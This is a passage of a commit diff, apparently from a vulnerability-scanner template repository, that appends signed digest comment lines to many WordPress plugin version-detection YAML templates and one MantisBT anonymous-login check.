.../wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/hostinger.yaml | 1 + http/technologies/wordpress/plugins/image-optimization.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/metform.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/simple-history.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/svg-support.yaml | 1 + http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/templately.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + .../technologies/wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-seopress.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + 201 files changed, 201 insertions(+), 1 deletion(-) diff --git a/http/default-logins/mantisbt/mantisbt-anonymous-login.yaml b/http/default-logins/mantisbt/mantisbt-anonymous-login.yaml index 44c3ae1c1b..6d248870e1 100644 --- a/http/default-logins/mantisbt/mantisbt-anonymous-login.yaml +++ b/http/default-logins/mantisbt/mantisbt-anonymous-login.yaml @@ -30,4 +30,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201cd4fb8e5b9edfdabb9e51e1946d869a78dd98154c64ba176d3ea231e5ad3ae7022100dd971809685c9e08b8e5fe39100d2d2da8f722f1ab83022653d06091daae5ca6:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022028ec65ce3e6d3aa1d7f9b172f42abba78d50ca73879cb1d4baa327b0814f8efa02207f8bc1d513857f405f1f9448e0e5ac2b1b2518d020749587164e0138f4d353b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 3fd2256749..a2b8cef9b5 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022018ba62114b4c2c177a0631178330bf8ca8453964e627ad2583a2e231a130a6c5022100e8d46ee9e0c4573a362fbf9578d61f96fa22f9b87fa6939b9c7b68c76cbbfcb5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 6a0d344b63..c51d3ae7eb 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220262eb01014678068fb110435ed2fd3f9ae6dec513700c9e395c35d938243606702206dc7652aaa793d30fe1a594d1e1628766ff7a80762ff6aa64f4026470fe7bdff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 6fb5080bc8..85dee1ef89 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c801dc88d30e2ae197eb846215609bd0dbb329228b88a8a108a73c4066e86bcd022100ffd7a10ecfb3fc82af5e37ad6909246679d04de14bc3bccaa39ed1c9788214c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index cddbb4bb2e..b935c1e1af 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c13575d7808f6e69e911c9bf63f68e7b8ae78400170ad5bce79714c53b22be41022100834a1f5f490e6f7c0b216b971f37681b0ad9f03625bf31228e10775522add8ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 6f253f9f55..4b7a69b0cb 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d68617be7743c4a8796da57b24f8ed6c46aa7612974866e01f2edcc4db3d3e80022005d38f088cb6a3eeece6584d8e164582290a00bcba27a2623d17732b271f255d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index fe45de4d04..28038c4c2e 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e7e8142af7f0933256b4ce0b1ab03f320071cd962e51847136d3e41a9275b1020221009944f8f9ac8f50e3f38adbcb7ea466d675b3d0d0dd445d68849177b7ac085ad5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 69e425f446..4d47934a5a 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008ac0f6c595e838c483b91b98c75b19e7d3567306e48c0d8c4948b5e35499894602210092a4363ed10efeba87bb0ef404f33eed89ea2cfad41ff14425f0e8e8f96aa55c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 9c07c65e4e..ab67a36d95 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f6487588bc1195517c716094a88be0db680acf3c826a3fc20090f504a27f0f2a02205c365cb7069749a7f8706a5192a8974c798e5316d65b4cff43b6ee666cdc1def:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 92c8f5656e..932c2d6377 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022059dc0fc25df973feab2212b627371d738c441a3b4e4c30a790bf8b20fdd9b99e02202d73de2f2bb5b7a547c5d3263e09dcc155e5c61ed42c025067c14ee643a1e020:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 70975a19a1..3248a1bf2c 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e2a76b4508cb9d6ccee21fdd6142d3c2cadf8c6a21536d4f747f78fe86f90f3a022100f3bc5b3e0292fe528a49f627953078af95931ee2a89acaa0502fcbd3220f8e99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index fd7e3e99dd..38a6477079 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022071c319cc170f18c8eebf281eb152e950f1b33d8edcf805e394dd8d983b9e27e2022061bf2ae70b06874ff8d7facf79183a29b5326c8486171f4ae95f90cc80cb5a0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 18f2a2ae84..faf5277205 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b01017837c9708170c6c7f660ad51f634d65da03d2b2ac91fa7101438be5875202200a7d9c216bc10a2bc24b394f97ba3364f03e71f4ee3aea00c88269e355f8500a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 11cb41fb2c..54410a6843 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009c1a4688b5cb0493ba0e23562c8b88a4960f20256862ca60324a6388bd65bbba022100cd0181c624ea3e37e7f5e4234f205db1814bbe5b980d101ef03053719cf1626a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index df3c5f3a94..2c2a214dd7 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022017518a6e71bacbaf11139f8622f1936bcc91f90c3e4ccd4f2a27843b0661e5a30221008d1d5be89cc3ca6ba808afefc804a8191c94377215a6b9afa17a6c40b144fd86:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6a50e049dc..b03fb6a0b8 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220689808feba7d6b158978163b09ec8b10a528a65387e6dfab2f213bda0e24460102201708ef9288ea4a4abaecc40da28f420208801dbeec89446b6bfc0dd09a14d152:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index e532694167..8bed2f2887 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a29472492f0b0232cc3deff5ba68a8d9e6a69d40475962ef16189a0012c62fe7022100a57c98a89e5f115e69185746072e490cb79856cefe042b40feeb623ffa275f61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 4c6e616c1d..14a2b4adbb 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100adf5588ef50fc3268520efcbcec8cc9773847e4ce3769c2fa209e8443b21e75e022100c506c836286afa9f1a052142eaf3141266f7b285769b944b8cd3e51ef39ad7f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index a70a58690c..db3cb25444 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207cc8fcaf7de198d69c86bdacb7f8a0e647b174d50d2503b6391190efbeaefa57022100b6e9f291e27360e5a911745b2dc375c92bbc0b667839259acc9ec2fd895e7292:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 4e3c68c53a..31eb0433c5 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f63b215992d88fb54e8ac3275cfbe185b2cf9893e16a1c0c7e24ab2d792ab615022072e15dfab48e9fabbf9d5240d4bbdbedd23f0f0d54731f838b1603d72330221e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index 0cd866179e..7453faa220 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b3334432e585b0307de6e7101ec22db027ad5219ae66c041be1a0dff475967b8022100800083fb1491874d3b935d379513bf2e8b77e4fe5e33ceb35c940bc6ac0295e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index b1d8479d13..a31a497911 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009fa700cff764ab4d300d9ba03770ba3896642b3870c230cb1e4b6709890407e0022100aac82e57ad735be9720ff6d82c549543a198de748a806d6e14a4e44912b5782e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 04e090313f..5399ae986c 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009d747c2b1147cb6f28ad726d69ea7b63862ad7700d6daec400724ad0a2a2116d02206038320ed731efe0b9de3af96f4988ebef77a6733c9d4c0435275d997c752a1d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 57e618924b..1593861fe5 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100aa33a9cebd414f168d4b268ee7e577aa2b693b64f25d4cd05d46609894d347c8022100c25c19c0c21b75b0ccfd634a9db82177ff7bc285781024fa84bf05086d1f1910:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 571b3b20a3..6e0d9dc4a2 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022024cbc2e0e9e7a3a57103dd314363652a026571bd6a4e9c4a8c87f11ee0527884022100afcaf294326a678318988c8e43805e4c898bdf3d7ce9e219acd2e57ab56b48ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 4d562316b4..0cf497e95e 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008a7cbd2def1ef208ac84395aecf9d0dfd23a8f3cacc0d8070e5d1b060529919402206d189f2d0a83fa5ec6642f703f00f0e9b0cb2463d0e3f09a904239c99315f94d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index dcea952545..755e0b3d78 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100da84c1dff7c6980febf8f347ea56fbc9cf715c18e8f9626390a12f28e0a73def022100f5dd487a8e4220213eb099a4af671a90780538e6bc043d58762b1fd87aeb2600:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 0ae2f18122..3b45bb8c3c 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008c695afd63fb46e88b99ba698e26b2fc8a95af529d7fcf1000d7c0d80a1353f30220763825c9fe9f345935016dbf38d7b1067bf611e67abd8ca596dfedf5d7d07a2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 12f549d536..59ebd51838 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220406de4ff1d015ca8a1b5ee851024c7c8b299b99182d461afd9b4e0a93af59384022100a1644a5dd54ad8bb3337621f05b469411a4e8a808bd9f321fa134ca6cae33e49:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index d8ea6a72f1..ee231e7191 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ 